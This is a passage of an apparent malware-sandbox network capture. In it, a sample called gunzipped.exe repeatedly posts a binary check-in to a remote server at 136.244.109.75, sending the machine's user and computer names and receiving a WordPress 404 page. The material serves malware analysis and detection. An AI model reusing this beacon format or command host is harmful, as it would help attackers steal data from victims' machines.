                          Apr 17, 2024 03:17:08.247534990 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:08.247575045 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:08.247611046 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.549723136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:08.603347063 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:08.806757927 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:09.761991978 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:08 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:09.762037039 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:09.762073994 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:09.762110949 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:09.762146950 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:09.762183905 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:09.762222052 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:09.762259007 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:09.762295961 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:09.762332916 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.549724136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:10.136681080 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:10.340393066 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:11.345689058 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:10 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:11.345755100 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:11.345793962 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:11.345834017 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:11.345874071 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:11.345912933 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:11.345952988 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:11.345993042 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:11.346030951 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:11.346071005 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.549725136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:11.695406914 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
